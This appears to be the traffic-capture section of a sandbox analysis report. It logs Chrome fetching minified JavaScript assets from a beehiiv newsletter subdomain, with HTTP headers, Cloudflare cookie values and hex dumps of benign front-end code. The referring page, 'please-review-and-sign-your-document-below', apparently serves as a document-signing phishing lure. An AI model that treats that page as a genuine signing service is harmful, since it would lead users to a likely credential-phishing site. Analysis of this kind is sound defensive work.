                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2c6-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bb48e64238-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 34 34 36 65 61 63 36 2d 30 35 63 33 2d 35 39 32 36 2d 62 62 34 61 2d 31 65 66 34 38 65 30 36 32 32 31 37 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f446eac6-05c3-5926-bb4a-1ef48e062217")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC237INData Raw: 2e 69 6e 6e 65 72 57 69 64 74 68 3e 73 26 26 65 26 26 69 28 21 31 29 7d 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 6e 29 2c 28 29 3d 3e 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 6e 29 7d 7d 2c 5b 65 5d 29 2c 65 7d 3b 65 78 70 6f 72 74 7b 6f 20 61 73 20 75 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 49 73 4d 6f 62 69 6c 65 2d 6f 6e 45 75 75 4d 46 56 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 66 34 34 36 65 61 63 36 2d 30 35 63 33 2d 35 39 32 36 2d 62 62 34 61 2d 31 65 66 34 38 65 30 36 32 32 31 37 0a
                                                                                                                                            Data Ascii: .innerWidth>s&&e&&i(!1)};return window.addEventListener("resize",n),()=>{window.removeEventListener("resize",n)}},[e]),e};export{o as u};//# sourceMappingURL=useIsMobile-onEuuMFV.js.map//# debugId=f446eac6-05c3-5926-bb4a-1ef48e062217


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            118192.168.2.1649844104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC550OUTGET /assets/index-pnFxOaac.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 868
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"364-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bb5e5f0f7c-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 37 30 37 36 36 30 63 2d 31 37 65 32 2d 35 64 63 64 2d 38 62 64 61 2d 35 35 33 63 38 32 34 65 66 30 34 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5707660c-17e2-5dcd-8bda-553c824ef04b")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC395INData Raw: 72 64 65 72 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 32 30 30 20 72 65 6c 61 74 69 76 65 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 72 6f 75 6e 64 65 64 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 68 2d 34 22 3a 22 72 65 6c 61 74 69 76 65 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 68 2d 31 2e 35 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 77 2d 66 75 6c 6c 22 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 28 6c 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 73 2c 76 61 6c 75 65 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 6f 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 28 22 68 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 62 67 2d 77 74 2d 70 72 69 6d 61 72 79 22 2c 61 3d 3d 3d 22 73 69 67 6e 75 70 2d 66 6c 6f 77 22 26 26 22 74 72 61 6e 73 69 74 69 6f 6e 2d 61 6c
                                                                                                                                            Data Ascii: rder border-gray-200 relative overflow-hidden rounded-full w-full h-4":"relative overflow-hidden h-1.5 bg-transparent w-full";return e.jsx(l,{className:s,value:r,children:e.jsx(o,{className:t("h-full w-full bg-wt-primary",a==="signup-flow"&&"transition-al


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            119192.168.2.1649846104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC849OUTGET /assets/LockClosedIcon-BluoCUMI.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1680
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"690-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4165
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bb7d62f5f4-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 62 34 62 65 66 65 32 2d 35 63 65 61 2d 35 34 61 34 2d 39 34 64 32 2d 63 36 66 62 63 30 65 35 63 30 64 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab4befe2-5cea-54a4-94d2-c6fbc0e5c0d1")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC1223INData Raw: 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6c 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 72 7d 2c 74 29 2c 61 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 72 7d 2c 61 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 31 2e 36 34 35 20 32 30 2e 39 31 2d 2e 30 30 37 2d 2e 30 30 33 2d 2e 30 32 32 2d 2e 30 31 32 61 31 35 2e 32 34 37 20 31 35 2e 32 34 37 20 30 20 30 20 31 2d 2e 33 38 33 2d 2e 32 31 38 20 32 35 2e 31 38 20 32 35 2e 31 38 20 30 20 30 20 31 2d 34 2e 32 34 34 2d 33 2e 31 37 43 34 2e 36 38 38 20 31 35 2e 33 36 20 32 2e 32 35 20 31 32
                                                                                                                                            Data Ascii: lor","aria-hidden":"true","data-slot":"icon",ref:l,"aria-labelledby":r},t),a?e.createElement("title",{id:r},a):null,e.createElement("path",{d:"m11.645 20.91-.007-.003-.022-.012a15.247 15.247 0 0 1-.383-.218 25.18 25.18 0 0 1-4.244-3.17C4.688 15.36 2.25 12


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            120192.168.2.1649847104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC555OUTGET /assets/disclosure-OT1gpdxK.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC902INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4640
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1220-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bba8d30f37-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC467INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 62 61 63 37 66 66 62 2d 63 66 33 38 2d 35 65 35 62 2d 62 34 36 36 2d 39 38 62 65 36 30 37 36 34 61 31 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cbac7ffb-cf38-5e5b-b466-98be60764a11")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 6f 6e 2d 79 2d 35 58 46 46 75 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 6a 7d 66 72 6f 6d 22 2e 2f 62 75 67 73 2d 44 56 51 7a 42 68 2d 73 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6f 20 61 73 20 51 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 3b 76 61 72 20 4d 3b 6c 65 74 20 56 3d 28 4d 3d 62 2e 73 74 61 72 74 54 72 61 6e 73 69 74 69 6f 6e 29 21 3d 6e 75 6c 6c 3f 4d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 29 7d 3b 76 61 72 20 59 3d 28 65 3d 3e 28 65 5b 65 2e 4f 70 65 6e 3d 30 5d 3d 22 4f 70 65 6e 22 2c 65 5b 65 2e 43 6c 6f 73 65 64 3d 31 5d 3d 22 43 6c 6f 73 65 64 22 2c 65 29 29 28 59 7c 7c 7b 7d 29 2c 5a 3d 28 65 3d 3e 28 65 5b 65 2e 54 6f 67 67 6c 65 44 69 73 63 6c 6f 73 75 72 65 3d
                                                                                                                                            Data Ascii: on-y-5XFFuu.js";import{r as j}from"./bugs-DVQzBh-s.js";import{o as Q}from"./use-is-mounted-BaHv16bB.js";var M;let V=(M=b.startTransition)!=null?M:function(e){e()};var Y=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(Y||{}),Z=(e=>(e[e.ToggleDisclosure=
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 79 4e 61 6d 65 3d 22 44 69 73 63 6c 6f 73 75 72 65 50 61 6e 65 6c 43 6f 6e 74 65 78 74 22 3b 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 6e 2e 75 73 65 43 6f 6e 74 65 78 74 28 4f 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 24 28 74 2e 74 79 70 65 2c 5f 2c 65 2c 74 29 7d 6c 65 74 20 47 3d 6e 2e 46 72 61 67 6d 65 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 65 2c 74 29 7b 6c 65 74 7b 64 65 66 61 75 6c 74 4f 70 65 6e 3a 73 3d 21 31 2c 2e 2e 2e 69 7d 3d 65 2c 6d 3d 6e 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 6c 3d 54 28 74 2c 41 28 75 3d 3e 7b 6d 2e 63 75 72 72 65 6e 74 3d 75 7d 2c 65 2e 61 73 3d 3d 3d 76 6f 69 64 20 30 7c 7c 65 2e 61 73 3d 3d 3d 6e 2e 46 72 61 67 6d 65 6e 74 29 29 2c 72 3d 6e 2e 75 73 65 52 65 66
                                                                                                                                            Data Ascii: yName="DisclosurePanelContext";function q(){return n.useContext(O)}function z(e,t){return $(t.type,_,e,t)}let G=n.Fragment;function J(e,t){let{defaultOpen:s=!1,...i}=e,m=n.useRef(null),l=T(t,A(u=>{m.current=u},e.as===void 0||e.as===n.Fragment)),r=n.useRef
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 6c 6c 7c 7c 44 2e 66 6f 63 75 73 28 29 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 73 77 69 74 63 68 28 6f 2e 6b 65 79 29 7b 63 61 73 65 20 6b 2e 53 70 61 63 65 3a 63 61 73 65 20 6b 2e 45 6e 74 65 72 3a 6f 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6f 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 72 28 7b 74 79 70 65 3a 30 7d 29 3b 62 72 65 61 6b 7d 7d 29 2c 49 3d 67 28 6f 3d 3e 7b 73 77 69 74 63 68 28 6f 2e 6b 65 79 29 7b 63 61 73 65 20 6b 2e 53 70 61 63 65 3a 6f 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 62 72 65 61 6b 7d 7d 29 2c 50 3d 67 28 6f 3d 3e 7b 76 61 72 20 44 3b 6a 28 6f 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 7c 7c 65 2e 64 69 73 61 62 6c 65 64 7c 7c 28 61 3f 28 72 28 7b 74 79 70 65 3a 30 7d 29 2c 28 44 3d 6c
                                                                                                                                            Data Ascii: ll||D.focus();break}}else switch(o.key){case k.Space:case k.Enter:o.preventDefault(),o.stopPropagation(),r({type:0});break}}),I=g(o=>{switch(o.key){case k.Space:o.preventDefault();break}}),P=g(o=>{var D;j(o.currentTarget)||e.disabled||(a?(r({type:0}),(D=l
                                                                                                                                            2025-01-15 18:14:38 UTC66INData Raw: 4f 54 31 67 70 64 78 4b 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 63 62 61 63 37 66 66 62 2d 63 66 33 38 2d 35 65 35 62 2d 62 34 36 36 2d 39 38 62 65 36 30 37 36 34 61 31 31 0a
                                                                                                                                            Data Ascii: OT1gpdxK.js.map//# debugId=cbac7ffb-cf38-5e5b-b466-98be60764a11


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            121192.168.2.1649848104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC557OUTGET /assets/SparklesIcon-DA4hsc2a.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1710
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"6ae-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bce80b42a1-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 35 31 38 37 30 65 62 2d 32 65 32 64 2d 35 62 66 31 2d 61 66 66 33 2d 33 34 61 66 32 33 39 31 35 63 36 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c51870eb-2e2d-5bf1-aff3-34af23915c6e")}catch(
